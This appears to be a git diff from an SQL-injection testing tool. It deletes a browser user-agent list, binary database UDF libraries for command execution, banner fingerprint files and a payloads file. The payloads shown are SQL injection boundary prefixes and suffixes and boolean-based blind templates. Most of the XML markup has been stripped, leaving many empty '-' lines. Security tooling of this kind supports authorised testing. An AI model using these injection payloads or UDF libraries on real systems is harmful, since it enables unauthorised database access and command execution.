U; en-GB) Presto/2.1.1 -Opera/9.60 (X11; Linux i686; U; ru) Presto/2.1.1 -Opera/9.60 (X11; Linux x86_64; U) -Opera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; cs) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; de) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; en) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; en-GB) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; fr) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; ru) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; zh-cn) Presto/2.1.1 -Opera/9.61 (Windows NT 5.1; U; zh-tw) Presto/2.1.1 -Opera/9.61 (Windows NT 5.2; U; en) Presto/2.1.1 -Opera/9.61 (Windows NT 6.0; U; en) Presto/2.1.1 -Opera/9.61 (Windows NT 6.0; U; http://lucideer.com; en-GB) Presto/2.1.1 -Opera/9.61 (Windows NT 6.0; U; pt-BR) Presto/2.1.1 -Opera/9.61 (Windows NT 6.0; U; ru) Presto/2.1.1 -Opera/9.61 (X11; Linux i686; U; de) Presto/2.1.1 -Opera/9.61 (X11; Linux i686; U; en) Presto/2.1.1 -Opera/9.61 (X11; Linux i686; U; pl) Presto/2.1.1 -Opera/9.61 (X11; Linux i686; U; ru) Presto/2.1.1 -Opera/9.61 (X11; Linux x86_64; U; fr) Presto/2.1.1 -Opera/9.62 (Windows NT 5.1; U; pl) Presto/2.1.1 -Opera/9.62 (Windows NT 5.1; U; pt-BR) Presto/2.1.1 -Opera/9.62 (Windows NT 5.1; U; ru) Presto/2.1.1 -Opera/9.62 (Windows NT 5.1; U; tr) Presto/2.1.1 -Opera/9.62 (Windows NT 5.1; U; zh-cn) Presto/2.1.1 -Opera/9.62 (Windows NT 5.1; U; zh-tw) Presto/2.1.1 -Opera/9.62 (Windows NT 5.2; U; en) Presto/2.1.1 -Opera/9.62 (Windows NT 6.0; U; de) Presto/2.1.1 -Opera/9.62 (Windows NT 6.0; U; en) Presto/2.1.1 -Opera/9.62 (Windows NT 6.0; U; en-GB) Presto/2.1.1 -Opera/9.62 (Windows NT 6.0; U; nb) Presto/2.1.1 -Opera/9.62 (Windows NT 6.0; U; pl) Presto/2.1.1 -Opera/9.62 (Windows NT 6.1; U; de) Presto/2.1.1 -Opera/9.62 (Windows NT 6.1; U; en) Presto/2.1.1 -Opera/9.62 (X11; Linux i686; U; Linux Mint; en) Presto/2.1.1 -Opera/9.62 (X11; Linux i686; U; en) Presto/2.1.1 -Opera/9.62 (X11; Linux i686; U; fi) Presto/2.1.1 -Opera/9.62 (X11; Linux i686; U; it) Presto/2.1.1 -Opera/9.62 (X11; Linux i686; U; pt-BR) Presto/2.1.1 -Opera/9.62 (X11; Linux x86_64; U; ru) Presto/2.1.1 -Opera/9.63 (Windows NT 5.1; U; pt-BR) Presto/2.1.1 -Opera/9.63 (Windows NT 5.2; U; de) Presto/2.1.1 -Opera/9.63 (Windows NT 5.2; U; en) Presto/2.1.1 -Opera/9.63 (Windows NT 6.0; U; cs) Presto/2.1.1 -Opera/9.63 (Windows NT 6.0; U; en) Presto/2.1.1 -Opera/9.63 (Windows NT 6.0; U; fr) Presto/2.1.1 -Opera/9.63 (Windows NT 6.0; U; nb) Presto/2.1.1 -Opera/9.63 (Windows NT 6.0; U; pl) Presto/2.1.1 -Opera/9.63 (Windows NT 6.1; U; de) Presto/2.1.1 -Opera/9.63 (Windows NT 6.1; U; en) Presto/2.1.1 -Opera/9.63 (Windows NT 6.1; U; hu) Presto/2.1.1 -Opera/9.63 (X11; FreeBSD 7.1-RELEASE i386; U; en) Presto/2.1.1 -Opera/9.63 (X11; Linux i686) -Opera/9.63 (X11; Linux i686; U; de) Presto/2.1.1 -Opera/9.63 (X11; Linux i686; U; en) -Opera/9.63 (X11; Linux i686; U; nb) Presto/2.1.1 -Opera/9.63 (X11; Linux i686; U; ru) -Opera/9.63 (X11; Linux i686; U; ru) Presto/2.1.1 -Opera/9.63 (X11; Linux x86_64; U; cs) Presto/2.1.1 -Opera/9.63 (X11; Linux x86_64; U; ru) Presto/2.1.1 -Opera/9.64 (Windows NT 6.0; U; pl) Presto/2.1.1 -Opera/9.64 (Windows NT 6.0; U; zh-cn) Presto/2.1.1 -Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1 -Opera/9.64 (Windows NT 6.1; U; de) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; Linux Mint; it) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; da) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; de) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; en) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; nb) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; pl) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; sv) Presto/2.1.1 -Opera/9.64 (X11; Linux i686; U; tr) Presto/2.1.1 -Opera/9.64 (X11; Linux x86_64; U; cs) Presto/2.1.1 -Opera/9.64 (X11; Linux x86_64; U; de) Presto/2.1.1 -Opera/9.64 (X11; Linux x86_64; U; en) Presto/2.1.1 -Opera/9.64 (X11; Linux x86_64; U; en-GB) Presto/2.1.1 -Opera/9.64 (X11; Linux x86_64; U; hr) Presto/2.1.1 -Opera/9.64 (X11; Linux x86_64; U; pl) Presto/2.1.1 -Opera/9.64(Windows NT 5.1; U; en) Presto/2.1.1 -Opera/9.70 (Linux i686 ; U; ; en) Presto/2.2.1 -Opera/9.70 (Linux i686 ; U; ; en) Presto/2.2.1 -Opera/9.70 (Linux i686 ; U; en) Presto/2.2.0 -Opera/9.70 (Linux i686 ; U; en) Presto/2.2.1 -Opera/9.70 (Linux i686 ; U; en-us) Presto/2.2.0 -Opera/9.70 (Linux i686 ; U; zh-cn) Presto/2.2.0 -Opera/9.70 (Linux ppc64 ; U; en) Presto/2.2.1 -Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15 -Opera/9.80 (Linux i686; U; en) Presto/2.5.22 Version/10.51 -Opera/9.80 (Macintosh; Intel Mac OS X; U; nl) Presto/2.6.30 Version/10.61 -Opera/9.80 (Windows 98; U; de) Presto/2.6.30 Version/10.61 -Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.2.15 Version/10.10 -Opera/9.80 (Windows NT 5.1; U; de) Presto/2.2.15 Version/10.10 -Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00 -Opera/9.80 (Windows NT 5.1; U; pl) Presto/2.6.30 Version/10.62 -Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.50 -Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00 -Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 5.2; U; en) Presto/2.6.30 Version/10.63 -Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51 -Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.6.30 Version/10.61 -Opera/9.80 (Windows NT 5.2; U; zh-cn) Presto/2.6.30 Version/10.63 -Opera/9.80 (Windows NT 6.0; U; Gecko/20100115; pl) Presto/2.2.15 Version/10.10 -Opera/9.80 (Windows NT 6.0; U; cs) Presto/2.5.22 Version/10.51 -Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.10 -Opera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00 -Opera/9.80 (Windows NT 6.0; U; it) Presto/2.6.30 Version/10.61 -Opera/9.80 (Windows NT 6.0; U; nl) Presto/2.6.30 Version/10.60 -Opera/9.80 (Windows NT 6.0; U; zh-cn) Presto/2.5.22 Version/10.50 -Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.10 -Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51 -Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.61 -Opera/9.80 (Windows NT 6.1; U; en-GB) Presto/2.7.62 Version/11.00 -Opera/9.80 (Windows NT 6.1; U; fi) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 6.1; U; fr) Presto/2.5.24 Version/10.52 -Opera/9.80 (Windows NT 6.1; U; ja) Presto/2.5.22 Version/10.50 -Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.6.31 Version/10.70 -Opera/9.80 (Windows NT 6.1; U; pl) Presto/2.7.62 Version/11.00 -Opera/9.80 (Windows NT 6.1; U; sk) Presto/2.6.22 Version/10.50 -Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.2.15 Version/10.00 -Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.5.22 Version/10.50 -Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.30 Version/10.61 -Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.37 Version/11.00 -Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.5.22 Version/10.50 -Opera/9.80 (X11; Linux i686; U; Debian; pl) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux i686; U; de) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux i686; U; en) Presto/2.5.27 Version/10.60 -Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux i686; U; en-GB) Presto/2.5.24 Version/10.53 -Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.6.30 Version/10.61 -Opera/9.80 (X11; Linux i686; U; it) Presto/2.5.24 Version/10.54 -Opera/9.80 (X11; Linux i686; U; nb) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux i686; U; pl) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux i686; U; pl) Presto/2.6.30 Version/10.61 -Opera/9.80 (X11; Linux i686; U; pt-BR) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux i686; U; ru) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux x86_64; U; de) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux x86_64; U; en) Presto/2.2.15 Version/10.00 -Opera/9.80 (X11; Linux x86_64; U; en-GB) Presto/2.2.15 Version/10.01 -Opera/9.80 (X11; Linux x86_64; U; it) Presto/2.2.15 Version/10.10 -Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00 -Opera/9.80 (X11; U; Linux i686; en-US; rv:1.9.2.3) Presto/2.2.15 Version/10.10 -Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9 diff --git a/txt/wordlist.zip b/txt/wordlist.zip deleted file mode 100644 index 9b018630f4f..00000000000 Binary files a/txt/wordlist.zip and /dev/null differ diff --git a/udf/mysql/linux/32/lib_mysqludf_sys.so b/udf/mysql/linux/32/lib_mysqludf_sys.so deleted file mode 100644 index 9eb5e82badd..00000000000 Binary files a/udf/mysql/linux/32/lib_mysqludf_sys.so and /dev/null differ diff --git a/udf/mysql/linux/64/lib_mysqludf_sys.so b/udf/mysql/linux/64/lib_mysqludf_sys.so deleted file mode 100644 index 9c6999ecd10..00000000000 Binary files a/udf/mysql/linux/64/lib_mysqludf_sys.so and /dev/null differ diff --git a/udf/mysql/windows/32/lib_mysqludf_sys.dll b/udf/mysql/windows/32/lib_mysqludf_sys.dll deleted file mode 100644 index a2196a25e9d..00000000000 Binary files a/udf/mysql/windows/32/lib_mysqludf_sys.dll and /dev/null differ diff --git a/udf/mysql/windows/64/lib_mysqludf_sys.dll b/udf/mysql/windows/64/lib_mysqludf_sys.dll deleted file mode 100644 index 3de734fc9f4..00000000000 Binary files a/udf/mysql/windows/64/lib_mysqludf_sys.dll and /dev/null differ diff --git a/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so deleted file mode 100644 index ce33ad34e69..00000000000 Binary files a/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so and /dev/null differ diff --git a/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so deleted file mode 100755 index eb20b094ea8..00000000000 Binary files a/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so and /dev/null differ diff --git a/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so deleted file mode 100755 index 9e07a823ff4..00000000000 Binary files a/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so and /dev/null differ diff --git a/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so b/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so deleted file mode 100755 index ddf07c98e2b..00000000000 Binary files a/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so and /dev/null differ diff --git a/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so deleted file mode 100755 index 02e7e09bac7..00000000000 Binary files a/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so and /dev/null differ diff --git a/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so deleted file mode 100755 index 5dd842a4b5b..00000000000 Binary files a/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so and /dev/null differ diff --git a/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so deleted file mode 100755 index 80eec1a745a..00000000000 Binary files a/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so and /dev/null differ diff --git a/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so deleted file mode 100755 index 7c29ff7a350..00000000000 Binary files a/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so and /dev/null differ diff --git a/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll deleted file mode 100755 index 342d45a081e..00000000000 Binary files a/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll and /dev/null differ diff --git a/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll deleted file mode 100755 index 9113b56c27f..00000000000 Binary files a/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll and /dev/null differ diff --git a/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll deleted file mode 100755 index 43ba07ad666..00000000000 Binary files a/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll and /dev/null differ diff --git a/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll b/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll deleted file mode 100644 index 5df72e78a79..00000000000 Binary files a/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll and /dev/null differ diff --git a/xml/banner/cookie.xml b/xml/banner/cookie.xml deleted file mode 100644 index c9e34d2ceaa..00000000000 --- a/xml/banner/cookie.xml +++ /dev/null @@ -1,37 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/xml/banner/generic.xml b/xml/banner/generic.xml deleted file mode 100644 index 8e3b8105784..00000000000 --- a/xml/banner/generic.xml +++ /dev/null @@ -1,138 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/xml/banner/mysql.xml b/xml/banner/mysql.xml deleted file mode 100644 index 2daf1d1adea..00000000000 --- a/xml/banner/mysql.xml +++ /dev/null @@ -1,42 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/xml/banner/postgresql.xml b/xml/banner/postgresql.xml deleted file mode 100644 index 3ae42c3a38f..00000000000 --- a/xml/banner/postgresql.xml +++ /dev/null @@ -1,25 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/xml/banner/x-powered-by.xml b/xml/banner/x-powered-by.xml deleted file mode 100644 index 0ca88545922..00000000000 --- a/xml/banner/x-powered-by.xml +++ /dev/null @@ -1,29 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/xml/errors.xml b/xml/errors.xml deleted file mode 100644 index d6bfb2d2115..00000000000 --- a/xml/errors.xml +++ /dev/null @@ -1,98 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/xml/livetests.xml b/xml/livetests.xml deleted file mode 100644 index 5a27d28e35a..00000000000 --- a/xml/livetests.xml +++ /dev/null @@ -1,3429 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/xml/payloads.xml b/xml/payloads.xml deleted file mode 100644 index 8f66520614b..00000000000 --- a/xml/payloads.xml +++ /dev/null @@ -1,4154 +0,0 @@ - - - - - - - - 3 - 1 - 1,2 - 1 - ) - - - - - 4 - 1 - 1,2 - 2 - ') - - - - - 3 - 1 - 1,2 - 2 - ' - - - - - 5 - 1 - 1,2 - 4 - " - - - - - - - 1 - 1 - 1,2 - 1 - ) - AND ([RANDNUM]=[RANDNUM] - - - - 2 - 1 - 1,2 - 1 - )) - AND (([RANDNUM]=[RANDNUM] - - - - 3 - 1 - 1,2 - 1 - ))) - AND ((([RANDNUM]=[RANDNUM] - - - - 1 - 0 - 1,2,3 - 1 - - - - - - 1 - 1 - 1,2 - 2 - ') - AND ('[RANDSTR]'='[RANDSTR] - - - - 2 - 1 - 1,2 - 2 - ')) - AND (('[RANDSTR]'='[RANDSTR] - - - - 3 - 1 - 1,2 - 2 - '))) - AND ((('[RANDSTR]'='[RANDSTR] - - - - 1 - 1 - 1,2 - 2 - ' - AND '[RANDSTR]'='[RANDSTR] - - - - 2 - 1 - 1,2 - 3 - ') - AND ('[RANDSTR]' LIKE '[RANDSTR] - - - - 3 - 1 - 1,2 - 3 - ')) - AND (('[RANDSTR]' LIKE '[RANDSTR] - - - - 4 - 1 - 1,2 - 3 - '))) - AND ((('[RANDSTR]' LIKE '[RANDSTR] - - - - 2 - 1 - 1,2 - 3 - ' - AND '[RANDSTR]' LIKE '[RANDSTR] - - - - 2 - 1 - 1,2 - 4 - ") - AND ("[RANDSTR]"="[RANDSTR] - - - - 3 - 1 - 1,2 - 4 - ")) - AND (("[RANDSTR]"="[RANDSTR] - - - - 4 - 1 - 1,2 - 4 - "))) - AND ((("[RANDSTR]"="[RANDSTR] - - - - 2 - 1 - 1,2 - 4 - " - AND "[RANDSTR]"="[RANDSTR] - - - - 3 - 1 - 1,2 - 5 - ") - AND ("[RANDSTR]" LIKE "[RANDSTR] - - - - 4 - 1 - 1,2 - 5 - ")) - AND (("[RANDSTR]" LIKE "[RANDSTR] - - - - 5 - 1 - 1,2 - 5 - "))) - AND ((("[RANDSTR]" LIKE "[RANDSTR] - - - - 3 - 1 - 1,2 - 5 - " - AND "[RANDSTR]" LIKE "[RANDSTR] - - - - 2 - 1 - 1,2 - 2 - %') - AND ('%'=' - - - - 3 - 1 - 1,2 - 2 - %')) - AND (('%'=' - - - - 4 - 1 - 1,2 - 2 - %'))) - AND ((('%'=' - - - - 1 - 1 - 1,2 - 2 - %' - AND '%'=' - - - - 5 - 1 - 1,2 - 2 - %00') - AND ('[RANDSTR]'='[RANDSTR] - - - - 4 - 1 - 1,2 - 2 - %00' - AND '[RANDSTR]'='[RANDSTR] - - - - - - - 5 - 1 - 1,2 - 2 - ') WHERE [RANDNUM]=[RANDNUM] - -- - - - - 5 - 1 - 1,2 - 2 - ") WHERE [RANDNUM]=[RANDNUM] - -- - - - - 4 - 1 - 1,2 - 1 - ) WHERE [RANDNUM]=[RANDNUM] - -- - - - - 4 - 1 - 1,2 - 2 - ' WHERE [RANDNUM]=[RANDNUM] - -- - - - - 5 - 1 - 1,2 - 4 - " WHERE [RANDNUM]=[RANDNUM] - -- - - - - 4 - 1 - 1,2 - 1 - WHERE [RANDNUM]=[RANDNUM] - -- - - - - - - 5 - 1 - 1 - 2 - '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] - )||' - - - - 5 - 1 - 1 - 2 - '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] - )||' - - - - 5 - 1 - 1 - 1 - '+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM] - )+' - - - - 5 - 1 - 1 - 2 - '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] - )+' - - - - - - 4 - 1 - 1 - 2 - ' IN BOOLEAN MODE) - # - - - - - - AND boolean-based blind - WHERE or HAVING clause - 1 - 1 - 1 - 1 - 1 - AND [INFERENCE] - - AND [RANDNUM]=[RANDNUM] - - - AND [RANDNUM]=[RANDNUM1] - - - - - AND boolean-based blind - WHERE or HAVING clause (MySQL comment) - 1 - 4 - 1 - 1 - 1 - AND [INFERENCE] - - AND [RANDNUM]=[RANDNUM] - # - - - AND [RANDNUM]=[RANDNUM1] - -
    - MySQL -
    -
